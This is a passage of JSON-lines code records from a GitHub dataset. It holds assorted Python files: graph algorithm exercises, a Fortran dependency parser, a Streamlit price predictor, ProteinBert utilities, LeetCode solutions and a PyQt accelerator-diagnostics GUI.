bat largement les différentes versions de l'algorithme de Kruskal.\n# * L'algorithme de Kruskal avec l'UNION-FIND utilisant les forêts est le plus\n# rapide sur les graphes peu denses, comme G3(n), mais Prim n'est vraiment pas\n# loin.\n# * Sur les graphes denses, comme G4(n), l'algorithme de Kruskal avec\n# l'UNION-FIND utilisant les forêts est un peu moins rapide que celui utilisant\n# le tableau.\n\n\n\"\"\"\ng = graphe_4(1024)\n# g = graphe_3(8192)\nt0 = time.time()\n\n# kruskal_inverse(g) # Beaucoup trop long sur ma machine... (Intel Core i5)\nt1 = time.time()\n# print(\"KRUSKAL_INV: \", round(t1-t0, 2), \"s\", sep=\"\")\n\nkruskal_ufl(g) # 0.48s sur ma machine (Intel Core i5)\nt2 = time.time()\nprint(\"KRUSKAL_UFL: \", round(t2-t1, 2), \"s\", sep=\"\")\n\nkruskal_uff(g) # 0.63s sur ma machine (Intel Core i5)\nt3 = time.time()\nprint(\"KRUSKAL_UFF: \", round(t3-t2, 2), \"s\", sep=\"\")\n\nprim(g) # 0.3s sur ma machine (Intel Core i5)\nt4 = time.time()\nprint(\"PRIM: \", round(t4-t3, 2), \"s\", sep=\"\")\n\nquit()\n\"\"\"\n\n\nif __name__ == \"__main__\":\n import doctest\n fonctions = [\n graphe_1,\n graphe_2,\n graphe_3,\n aretes_triees,\n est_connexe,\n kruskal_inverse,\n ufl_creer,\n ufl_find,\n ufl_union,\n kruskal_ufl,\n uff_creer,\n uff_find,\n uff_union,\n kruskal_uff,\n prim,\n ]\n for f in fonctions:\n print(\"**********************************************************************\")\n print(f.__name__)\n doctest.run_docstring_examples(\n f, globals(), optionflags=doctest.FAIL_FAST)\n","repo_name":"ThearchyHelios/INF303","sub_path":"TP3/tp.py","file_name":"tp.py","file_ext":"py","file_size_in_byte":26142,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28539822705","text":"import re\n\nfrom depgen import IncludeFinder, StreamStack, file_in_dir, open23, \\\n find_unquoted_string\n\n\nclass FortranParser:\n _re_include = re.compile(r'^\\s*include\\s+(\\'|\")(.*?)\\1', re.I)\n _re_line_continue_start = re.compile(r'^(.*)&\\s*$')\n _re_line_continue_end = re.compile(r'^\\s*&')\n _re_module_provide = re.compile(r'^\\s*module\\s+(?!procedure\\s)(\\w+)', re.I)\n _re_module_require = re.compile(\n r'^\\s*use(?:\\s+|(?:\\s*,\\s*((?:non_)?intrinsic))?\\s*::\\s*)(\\w+)', re.I)\n\n def __init__(self,\n include_order=None,\n include_dirs=None,\n include_roots=None,\n intrinsic_mods=None,\n external_mods=None):\n self.include_roots = include_roots\n\n if intrinsic_mods:\n self.intrinsic_mods = set(intrinsic_mods)\n else:\n self.intrinsic_mods = set()\n\n if external_mods:\n self.external_mods = set(external_mods)\n else:\n self.external_mods = set()\n\n # Callbacks:\n self.include_callback = None\n self.module_callback = None\n self.use_module_callback = None\n self.debug_callback = None\n\n self._include_finder = IncludeFinder(include_order, include_dirs)\n\n def parse(self, stream):\n with StreamStack() as s:\n s.add(stream)\n while 1:\n line = s.readline()\n if not line:\n break\n\n # delete comments\n line = FortranParser._delete_comments(line)\n if line.isspace():\n continue\n\n # line continuation\n match = FortranParser._re_line_continue_start.match(line)\n while match:\n next_line = s.readline()\n if not next_line:\n break\n\n next_line = FortranParser._delete_comments(next_line)\n\n # If the line contains only comments, we need the next one\n # TODO: implement a separate class FortranPrepcocessor\n if next_line.isspace():\n continue\n\n line = match.group(1) + re.sub(\n FortranParser._re_line_continue_end, '', next_line)\n\n match = FortranParser._re_line_continue_start.match(line)\n\n for line in FortranParser._split_semicolons(line):\n # module provided\n match = FortranParser._re_module_provide.match(line)\n if match:\n module_name = match.group(1).lower()\n if self.module_callback:\n self.module_callback(module_name)\n if self.debug_callback:\n self.debug_callback(\n line, 'declared module \\'%s\\'' % module_name)\n continue\n\n # module required\n match = FortranParser._re_module_require.match(line)\n if match:\n module_nature = match.group(1).lower() \\\n if match.group(1) is not None else ''\n module_name = match.group(2).lower()\n if module_nature == 'intrinsic':\n if self.debug_callback:\n self.debug_callback(\n line, 'ignored module usage (\\'%s\\' '\n 'is explicitly intrinsic)'\n % module_name)\n elif (module_name in self.intrinsic_mods and\n module_nature != 'non_intrinsic'):\n if self.debug_callback:\n self.debug_callback(\n line, 'ignored module usage (\\'%s\\' '\n 'is implicitly intrinsic)'\n % module_name)\n elif module_name in self.external_mods:\n if self.debug_callback:\n self.debug_callback(\n line, 'ignored module usage (\\'%s\\' '\n 'is external)' % module_name)\n else:\n if self.use_module_callback:\n self.use_module_callback(module_name)\n if self.debug_callback:\n self.debug_callback(\n line, 'used module \\'%s\\'' % module_name)\n continue\n\n # include statement\n match = FortranParser._re_include.match(line)\n if match:\n filename = match.group(2)\n filepath = self._include_finder.find(\n filename,\n s.root_name,\n s.current_name)\n if filepath:\n if not self.include_roots or any(\n [file_in_dir(filepath, d)\n for d in self.include_roots]):\n s.add(open23(filepath, 'r'))\n if self.include_callback:\n self.include_callback(filepath)\n if self.debug_callback:\n self.debug_callback(\n line, 'included file \\'%s\\''\n % filepath)\n elif self.debug_callback:\n self.debug_callback(\n line,\n 'ignored (file \\'%s\\' '\n 'is not in the source roots)' % filepath)\n elif self.debug_callback:\n self.debug_callback(line,\n 'ignored (file not found)')\n continue\n\n @staticmethod\n def _split_semicolons(line):\n while 1:\n idx = find_unquoted_string(';', line)\n if idx < 0:\n if line and not line.isspace():\n yield line\n break\n else:\n prefix = line[:idx]\n if prefix and not prefix.isspace():\n yield prefix + '\\n'\n line = line[idx + 1:]\n\n @staticmethod\n def _delete_comments(line):\n comment_idx = find_unquoted_string('!', line)\n if comment_idx >= 0:\n line = line[:comment_idx]\n return line\n\n","repo_name":"skosukhin/mkhelper","sub_path":"mkhelper/depgen/fortran_parser.py","file_name":"fortran_parser.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6243698463","text":"# https://app.codesignal.com/arcade/intro/level-2/2mxbGwLzvkTCKAJMG\n\na=[1, 3, 2, 1]\nincr=True\ndelCount=0\nfor i in range(len(a)-1 , 0 ,-1):\n print(a[i],\" ---- \",a[i-1])\n if a[i]-a[i-1]<=0:#if num not grater than before it\n incr=False\n delCount +=1\nprint(delCount)\nprint(incr)","repo_name":"MohammedTAgha/Brain-fu__n","sub_path":"CODE_SIGNAL/almostIncreasingSequence.py","file_name":"almostIncreasingSequence.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71168157922","text":"from extensions import db\n\ngenre_tag = db.Table(\"genre_tag\",\n db.Column(\"genre_id\", db.Integer, db.ForeignKey(\"genres.id\"), primary_key=True),\n db.Column(\"movie_id\", db.Integer, db.ForeignKey(\"movies.id\"), primary_key=True)\n)\n\n\nclass Genre(db.Model):\n __tablename__ = \"genres\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=True, unique=True)\n movies = db.relationship(\"Movie\", secondary=genre_tag, lazy=\"subquery\", back_populates=\"genres\")\n\n","repo_name":"timiredmind/recommender_system","sub_path":"models/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10391958219","text":"\"\"\"\nThis program gets Wildcard of the given ip address in CIDR notation\n\"\"\"\n\nimport requests\nimport json\n\n\"\"\"\nGet the wildcard of the given IP adress\n\"\"\"\n\ndef getWildcard(ip):\n link = \"https://uploadbeta.com/api/ipcalc/?cached&s=\" + ip\n response = requests.get(link)\n parsed_json = json.loads(response.text)\n print(parsed_json)\n s =\"\"\n for i in range (149,170):\n s +=parsed_json[i]\n final = s.replace(\" \", \"\")\n print(final)\n return final\n\n\n\"\"\"\nMakes a text file with output.txt and outputs wildcard\n\"\"\"\n\ndef fileBuilder(ip):\n ab = ip.find(\"/\")\n modifiedIp = ip[:ip.find(\"/\")]\n finalString = \"The wildcard for the IP \" + modifiedIp + \" is- \" + getWildcard(ip) + \"\\n\"\n f = open(\"output.txt\", \"a+\")\n f.write(finalString)\n\n\n\"\"\"\nTakes input of a text file named input.txt with ip addresses in \nevery new line\n\"\"\"\n\ndef main():\n fname = \"input.txt\" # sample input ip/[1-32] i.g- 8.8.8.8/20\n with open(fname) as f:\n content = f.readlines()\n finalList = []\n for i in content:\n a = i.replace(\"\\n\", \"\")\n finalList.append(a)\n print(finalList)\n for b in finalList:\n fileBuilder(b)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"mxnavid/Network-Tools","sub_path":"wildCard.py","file_name":"wildCard.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30588230870","text":"import streamlit as st\n# import requests\nimport pandas as pd\nimport pickle\n\n# ============= DATA LOADING =============\n\nwith open(\"pipe_linear_regression.pkl\", \"rb\") as model_file:\n model = pickle.load(model_file)\n\ndf = pd.read_csv('house_price_pred.csv')\nmask_floors = {1: 1, 1.5 : 1, 2:2, 2.5:2, 3:3, 3.5:3}\ndf['floors'] = df['floors'].map(mask_floors)\ndf['yr_renovated'] = df['yr_renovated'].apply(lambda x: 0 if x==0 else 1)\n# price = df['price']\n\nst.title(\"Aplikasi Prediksi Harga Rumah di Negara Amerika Serikat (USA)\")\nst.write(\"Created by Lutfi Adam\")\n\ncolumns = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors',\n 'condition', 'sqft_above', 'sqft_basement', 'yr_built', 'yr_renovated',\n 'city']\n\n# ============= INPUT =============\ncity = st.selectbox(\"Lokasi Kota\", df['city'].unique())\nbedroom = st.selectbox(\"Kamar Tidur\", df['bedrooms'].unique())\nbathroom = st.selectbox(\"Kamar Mandi\", df['bathrooms'].unique())\nfloor = st.selectbox(\"Tingkatan Rumah\", df['floors'].unique())\ncondition = st.selectbox(\"Kondisi Rumah\", df['condition'].unique())\nabove = st.number_input(\"Luas Tanah\")\nlot = st.number_input(\"Luas Halaman Rumah\")\nliving = st.number_input(\"Luas Ruang Tamu\")\nbasement = st.number_input(\"Luas Ruang Bawah Tanah\")\nyear_build = st.number_input('Tahun Rumah dibangun')\nrenovated = st.selectbox(\"Rumah Sudah di Renovasi (Sudah direnovasi = 1, Belum direnovasi = 0)\", df['yr_renovated'].unique())\n\n\n\n# =========== INFERENCE =============\nnew_data = [bedroom,bathroom,living,lot,floor,condition,above,basement,year_build,renovated,city]\nnew_data = pd.DataFrame([new_data], columns=columns)\nres = model.predict(new_data)\npress = st.button('PREDIKSI')\nif press:\n st.write(f'HARGA RUMAH : {res[0]}')","repo_name":"lutfiadam97/house_price_in_USA","sub_path":"all_in_one.py","file_name":"all_in_one.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16924432357","text":"# Function to draw 2d Self-Avoiding Walk (Square Lattice model)\n\n# 周期的境界条件の設定(v3)\n# coordinateXY_listを使わない計算\n\nimport random as rd\nfrom math import *\n\ndef saw2dFuncM(lattice_x, lattice_y, coordinate_init, occupied_coordinate_list, N):\n\n num = 0\n num_f = 0\n\n direction_list = ([1,0],[-1,0],[0,1],[0,-1])\n\n while num < N:\n num = 0\n rep = 0 # 経路を探せなかったときの繰り返し回数\n x, y = coordinate_init[0], coordinate_init[1]\n x_list = [x]\n y_list = [y]\n coordinate_list = [[x,y]] \n coordinate_list = occupied_coordinate_list + coordinate_list\n num_list = []\n while rep < 20 and num < N:\n step = rd.choice(direction_list)\n x_temp = x + step[0]\n y_temp = y + step[1]\n if x_temp >= lattice_x:\n x_temp = x_temp - lattice_x\n if x_temp < 0:\n x_temp = x_temp + lattice_x\n if y_temp >= lattice_y:\n y_temp = y_temp - lattice_y\n if y_temp < 0:\n y_temp = y_temp + lattice_y\n coordinate_temp = [x_temp, y_temp]\n if coordinate_temp in coordinate_list:\n num = num\n num_list.append(num)\n rep = num_list.count(num_list[-1]) \n else:\n x = x_temp\n y = y_temp\n x_list.append(x)\n y_list.append(y)\n coordinate = [x, y]\n coordinate_list.append(coordinate)\n num = num + 1\n if num == N:\n print(\"final num = {}: success\".format(num+1)) # to check the number of steps\n occupied_coordinate_list = coordinate_list\n else:\n print(\"final num = {}: failure\".format(num+1)) # to check the number of steps\n num_f = num_f + 1\n if num_f == 100:\n print(\"num_f = {}\".format(num_f))\n break\n\n return occupied_coordinate_list","repo_name":"knakaji1210/lecture_polymphys_sawsolution","sub_path":"saw2dFuncM_v3.py","file_name":"saw2dFuncM_v3.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26672088517","text":"\n\nimport os\nimport re\nimport string\nimport urllib\nimport pandas as pd\nimport urllib.request\nfrom Bio import SeqIO\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom itertools import groupby\nfrom tensorflow.keras import layers\n\ndef download_file(file_url: str, data_dir: str = \"./data\"):\n file_name = file_url.split(\"/\")[-1]\n if not os.path.isfile(os.path.join(data_dir, file_name)):\n if not os.path.exists(data_dir): os.makedirs(data_dir)\n print(f\"Downloading {file_url}. Warning - slower than downloading externally\")\n urllib.request.urlretrieve(file_url, os.path.join(data_dir, file_name))\n\ndef deduplicate_list(res: list):\n from collections import OrderedDict\n return list(OrderedDict.fromkeys(res))\n\ndef extract_scop(file_path:str,split_char:str=\" \", label_index:int=1, max_records = 1e6) -> list:\n record_iterator = SeqIO.parse(file_path, \"fasta\")\n all_records = []\n for seq_record in record_iterator:\n if len(all_records)<=max_records:\n protein_class = seq_record.description.split(split_char)[label_index] # this is \n protein_sequence = str(seq_record.seq).upper()\n all_records.append((\n protein_sequence,\n protein_class\n ))\n return(all_records)\n\ndef sliding_truncate_df_seqs_lengthwise(row,max_length:int = 4096):\n r_len = len(row)\n if r_len > max_length:\n return(row[0:max_length//2] + row[-max_length//2:]) # take first and last segments up to max length total\n return row\n\ndef cut_string(text:str,get_first_part=True)->str:\n midpoint = len(text)//2\n if get_first_part:\n return(text[0:midpoint])\n else:\n return(text[midpoint:])\n\ndef fasta_iter(fasta_name,max_records:int=1e8,seq_only:bool=True,MAX_LEN:int= None):\n fh = open(fasta_name)\n faiter = (x[1] for x in groupby(fh, lambda line: line[0] == \">\"))\n for i,header in enumerate(faiter):\n if i>max_records: break\n header = header.__next__()[1:].strip()\n seq = \"\".join(s.strip() for s in faiter.__next__())\n if MAX_LEN!=None:\n seq = sliding_truncate_df_seqs_lengthwise(row=seq,max_length = MAX_LEN)\n if seq_only: \n yield seq\n else:\n yield header, seq\n \ndef fasta_to_df(fasta_path,max_records:int=1e9,seq_only=False,MAX_LEN= None):\n return pd.DataFrame(fasta_iter(fasta_name=fasta_path,max_records=max_records,seq_only=seq_only,MAX_LEN= None))\n\ndef normalize_word(data_str):\n url_re = re.compile('https?://(www.)?\\w+\\.\\w+(/\\w+)*/?')\n punc_re = re.compile('[%s]' % re.escape(string.punctuation))\n num_re = re.compile('(\\\\d+)')\n mention_re = re.compile('@(\\w+)')\n alpha_num_re = re.compile(\"^[a-z0-9_.]+$\")\n data_str = data_str.lower()\n data_str = url_re.sub(' ', data_str)\n data_str = mention_re.sub(' ', data_str)\n data_str = punc_re.sub(' ', data_str)\n data_str = num_re.sub(' ', data_str)\n list_pos = 0\n cleaned_str = ''\n for word in data_str.split():\n if list_pos == 0:\n if alpha_num_re.match(word) and len(word) > 2:\n cleaned_str = word\n else:\n cleaned_str = ' '\n else:\n if alpha_num_re.match(word) and len(word) > 2:\n cleaned_str = cleaned_str + ' ' + word\n else:\n cleaned_str += ' '\n list_pos += 1\n return cleaned_str\n","repo_name":"ddofer/ProteinBert","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37772093761","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')\n\n\ndef removeKdigits(num, k):\n stack = []\n for i in range(len(num)):\n\n curr = num[i]\n while stack and k and num[i] < stack[-1]:\n stack.pop()\n k -= 1\n stack.append(curr)\n print(stack)\n\n if k:\n del stack[-k:]\n res = ''.join(stack).lstrip('0')\n return res if res else '0'\n\n\nnum = \"1432219\"\nk = 3\n\nprint(removeKdigits(num, k))\n","repo_name":"Omkar02/FAANG","sub_path":"AZ_LC_402_Remove_K_Digits.py","file_name":"AZ_LC_402_Remove_K_Digits.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14229305154","text":"from bisect import *\n\ndef increasingTriplet(nums):\n min1, min2 = nums[0], float('inf')\n for i in nums:\n if min2 < i: return True\n if min1 < i:\n min2 = min(min2, i)\n else:\n min1 = i\n return False\n\nincreasingTriplet([2,1,5,0,4,6])","repo_name":"Hrishi246/InterviewPractise","sub_path":"Misc/increasingTriplet.py","file_name":"increasingTriplet.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26256279014","text":"''' Diagnostic Interface of the LINAC's BPM'''\nfrom qtpy.QtCore import Qt\nfrom qtpy.QtWidgets import QGroupBox, QVBoxLayout, QTabWidget, \\\n QWidget, QLabel, QGridLayout\nimport qtawesome as qta\nfrom pydm.widgets import enum_button, PyDMEnumComboBox\n\nfrom ..util import get_appropriate_color\nfrom ..widgets import SiriusMainWindow, SiriusLedState, SiriusLabel, \\\n SiriusSpinbox\nfrom ..as_di_bpms.base import GraphWave\n\n\nclass DigBeamPosProc(SiriusMainWindow):\n ''' Class Digital Beam Position Processor '''\n\n def __init__(self, device_name, prefix='', parent=None):\n '''Contain all the graphic interface data'''\n super().__init__(parent)\n self.device_name = device_name\n self.prefix = prefix + ('-' if prefix else '')\n\n color = get_appropriate_color('LI')\n self.setWindowIcon(qta.icon('mdi.currency-sign', color=color))\n self.setObjectName('LIApp')\n\n self.setWindowTitle(self.device_name)\n\n self.header = {\n \"Trigger\": \"TRIGGER_STATUS\",\n \"IOC\": \"HEART_BEAT\"\n }\n\n self.graph_all_data = {\n \"ADC Raw Waveform\": {\n \"title\": \"ADC\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"ADC Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_ADX_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_ADX_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_ADX_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_ADX_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n },\n \"Hilbert\": {\n \"Amplitude\": {\n \"title\": \"Amplitude\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Amplitude Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_HIB_AMP_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_HIB_AMP_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_HIB_AMP_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_HIB_AMP_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n },\n \"Phase\": {\n \"title\": \"Phase\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Phase Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_HIB_PH_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_HIB_PH_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_HIB_PH_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_HIB_PH_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n }\n },\n \"FFT\": {\n \"Amplitude\": {\n \"title\": \"Amplitude\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Amplitude Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_FFT_AMP_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_FFT_AMP_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_FFT_AMP_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_FFT_AMP_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n },\n \"Phase\": {\n \"title\": \"Phase\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Phase Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_FFT_PH_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_FFT_PH_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_FFT_PH_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_FFT_PH_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n }\n }\n }\n\n self.bpm_main_data = {\n \"Max ADC\": {\n \"A\": \"CH1_MAXADC\",\n \"B\": \"CH2_MAXADC\",\n \"C\": \"CH3_MAXADC\",\n \"D\": \"CH4_MAXADC\"\n },\n \"Position\": {\n \"X\": \"POS_X\",\n \"Y\": \"POS_Y\",\n \"S\": \"POS_S\"\n },\n \"V\": {\n \"A\": \"POS_VA\",\n \"B\": \"POS_VB\",\n \"C\": \"POS_VC\",\n \"D\": \"POS_VD\"\n },\n \"Trigger Cnt\": \"TRIGGER_CNT\",\n \"Cycle\": \"ACQ_TIME_USED\",\n \"FFT\": {\n \"Center\": \"FFT_CENTER\",\n \"Width\": \"FFT_WIDTH\"\n },\n \"Hilbert\": {\n \"Center\": \"HIB_CENTER\",\n \"Width\": \"HIB_WIDTH\"\n },\n \"Gain\": {\n \"X\": \"POS_KX\",\n \"Y\": \"POS_KY\",\n \"S\": \"POS_KS\"\n },\n \"Offset\": {\n \"X\": \"POS_OX\",\n \"Y\": \"POS_OY\"\n }\n }\n\n self.bpm_sec_data = {\n \"Attenuator\": \"FE_ATTEN_SP\",\n \"ADC Threshold\": \"ADC_THD\",\n \"Orientation\": \"BPM_STRIP\"\n }\n\n self.selectors_data = {\n \"Trigger Mode\": \"ACQ_TRIGGER\",\n \"Position Algorithm\": \"POS_ALG\"\n }\n\n self._setupUi()\n\n def _setupUi(self):\n '''Build the graphic interface'''\n wid = QWidget(self)\n if_glay = QGridLayout()\n\n if_glay.addLayout(self.display_header(), 0, 0, 1, 3)\n if_glay.addLayout(self.display_graph(), 1, 0, 2, 1)\n if_glay.addLayout(self.display_mainData(), 1, 1, 1, 1)\n if_glay.addLayout(self.display_selectors(), 1, 2, 1, 1)\n if_glay.setAlignment(Qt.AlignTop)\n if_glay.setColumnStretch(0, 10)\n\n wid.setLayout(if_glay)\n self.setCentralWidget(wid)\n\n def display_header(self):\n '''Display the header of the interface'''\n hd_glay = QGridLayout()\n\n title_lb = QLabel('<h2>' + self.device_name + ' - POSITION MONITOR </h2>', self)\n title_lb.setAlignment(Qt.AlignCenter)\n hd_glay.addWidget(title_lb, 0, 2, 2, 1)\n\n countx = 0\n\n for led_lb, led_channel in self.header.items():\n trig_led = SiriusLedState(\n init_channel=self.prefix + self.device_name + ':' + led_channel)\n trig_led.setFixedSize(30, 30)\n hd_glay.addWidget(trig_led, 0, countx, 1, 1)\n\n trig_lb = QLabel(led_lb)\n trig_lb.setAlignment(Qt.AlignCenter)\n hd_glay.addWidget(trig_lb, 1, countx, 1, 1)\n\n countx += 1\n\n hd_glay.setAlignment(Qt.AlignCenter)\n\n return hd_glay\n\n def createGraph(self, graph_data):\n '''Build a graph widget'''\n graph_plot = GraphWave()\n\n graph_plot.graph.title = graph_data.get(\"title\")\n graph_plot.setLabel(\n 'left',\n text=graph_data.get(\"labelY\"),\n units=graph_data.get(\"unitY\"))\n graph_plot.setLabel(\n 'bottom',\n text=graph_data.get(\"labelX\"),\n units=graph_data.get(\"unitX\"))\n\n for channel in graph_data.get(\"channels\"):\n\n channel_data = graph_data.get(\"channels\").get(channel)\n graph_plot.addChannel(\n y_channel=self.prefix + self.device_name + ':' + channel_data.get('path'),\n name=channel_data.get('name'),\n color=channel_data.get('color'),\n lineWidth=1)\n\n graph_plot.setMinimumWidth(600)\n graph_plot.setMinimumHeight(250)\n\n return graph_plot\n\n def display_graph(self):\n '''Display the graph tabs and all their contents'''\n gp_vlay = QVBoxLayout()\n tab = QTabWidget()\n tab.setObjectName(\"LITab\")\n\n for graph_name in self.graph_all_data:\n tablay = QVBoxLayout()\n tab_content = QWidget()\n\n graph_item = self.graph_all_data.get(graph_name)\n\n if len(graph_item.items()) != 2:\n tablay.addWidget(self.createGraph(graph_item), 10)\n tab_content.setLayout(tablay)\n else:\n for data in graph_item:\n tablay.addWidget(\n self.createGraph(graph_item.get(data)), 10)\n\n tab_content.setLayout(tablay)\n tab.addTab(tab_content, graph_name)\n\n gp_vlay.addWidget(tab)\n\n return gp_vlay\n\n def dataItem(self, channel, style):\n '''Get data channel info'''\n if style == 0:\n channel_info = SiriusLabel(\n parent=self,\n init_channel=self.prefix + self.device_name + ':' + channel)\n elif style in [1, 2, 4]:\n channel_info = SiriusSpinbox(\n parent=self,\n init_channel=self.prefix + self.device_name + ':' + channel)\n else:\n channel_info = QLabel(\"Error\", self)\n\n return channel_info\n\n def display_data(self, title, info, pos_x, pos_y, style):\n '''Build a data widget'''\n glay = QGridLayout()\n group = QGroupBox()\n\n countx = 0\n county = 0\n\n if style == 0:\n for text, channel in info.items():\n\n text_lb = QLabel(text, self)\n glay.addWidget(text_lb, countx, county)\n\n channel_lb = self.dataItem(channel, pos_y)\n channel_lb.showUnits = True\n glay.addWidget(channel_lb, countx, county+1)\n\n countx += 1\n else:\n channel_lb = self.dataItem(info, pos_y)\n channel_lb.showUnits = True\n glay.addWidget(channel_lb, pos_x, pos_y)\n\n glay.setAlignment(Qt.AlignCenter)\n\n group.setTitle(title)\n group.setLayout(glay)\n\n return group\n\n def display_mainData(self):\n '''Display all main data widgets'''\n countx = 0\n county = 0\n\n md_glay = QGridLayout()\n\n for title, info in self.bpm_main_data.items():\n\n if title in [\"Trigger Cnt\", \"Cycle\"]:\n md_glay.addWidget(\n self.display_data(\n title, info,\n countx, county, 1),\n countx, county,\n 1, 1)\n countx += 1\n else:\n md_glay.addWidget(\n self.display_data(\n title, info,\n countx, county, 0),\n countx, county,\n 2, 1)\n countx += 2\n\n if countx > 7:\n countx = 0\n county += 2\n\n md_glay.setAlignment(Qt.AlignCenter)\n\n return md_glay\n\n def display_secData(self):\n '''Build the secondary data widget'''\n\n group = QGroupBox()\n sc_glay = QGridLayout()\n\n countx = 0\n for text, channel in self.bpm_sec_data.items():\n\n if text != \"Orientation\":\n\n text_lb = QLabel(text, self)\n sc_glay.addWidget(text_lb, countx, 0, 1, 1)\n\n channel_lb = self.dataItem(channel, 1)\n channel_lb.showUnits = True\n sc_glay.addWidget(channel_lb, countx, 1, 1, 1)\n else:\n text_lb = QLabel(text, self)\n text_lb.setAlignment(Qt.AlignCenter)\n sc_glay.addWidget(text_lb, countx, 0, 1, 2)\n selection = PyDMEnumComboBox(\n init_channel=self.prefix + self.device_name+\":\"+channel)\n sc_glay.addWidget(selection, countx+1, 0, 1, 2)\n countx += 1\n\n sc_glay.setAlignment(Qt.AlignTop)\n group.setLayout(sc_glay)\n\n return group\n\n def selectionItem(self, title, channel, orientation):\n '''Build a selection widget'''\n group = QGroupBox()\n lay = QVBoxLayout()\n\n selector = enum_button.PyDMEnumButton(\n init_channel=self.prefix + self.device_name+\":\"+channel)\n selector.widgetType = 0\n selector.orientation = orientation\n lay.addWidget(selector, 0)\n\n group.setLayout(lay)\n group.setTitle(title)\n\n return group\n\n def display_selectors(self):\n '''Display the selector and the secondary data'''\n sl_vlay = QVBoxLayout()\n for title, channel in self.selectors_data.items():\n sl_vlay.addWidget(\n self.selectionItem(title, channel, 2), 1)\n\n sl_vlay.addWidget(self.display_secData(), 0)\n\n return 